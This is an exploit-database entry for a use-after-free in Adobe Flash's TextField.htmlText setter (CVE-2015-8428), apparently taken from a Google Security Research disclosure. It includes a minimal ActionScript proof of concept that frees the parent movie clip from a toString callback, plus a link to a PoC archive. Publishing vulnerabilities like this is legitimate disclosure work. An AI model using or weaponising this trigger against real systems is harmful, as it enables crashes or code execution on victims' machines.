Adobe Flash TextField.htmlText Setter - Use-After-Free

2015-12-18T00:00:00
ID EDB-ID:39051
Type exploitdb
Reporter Google Security Research
Modified 2015-12-18T00:00:00

Description

Adobe Flash TextField.htmlText Setter - Use-After-Free. CVE-2015-8428. Dos exploit for windows platform

                                        
                                            Source: https://code.google.com/p/google-security-research/issues/detail?id=578

There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.htmlText = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "<b>hello</b>";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39051.zip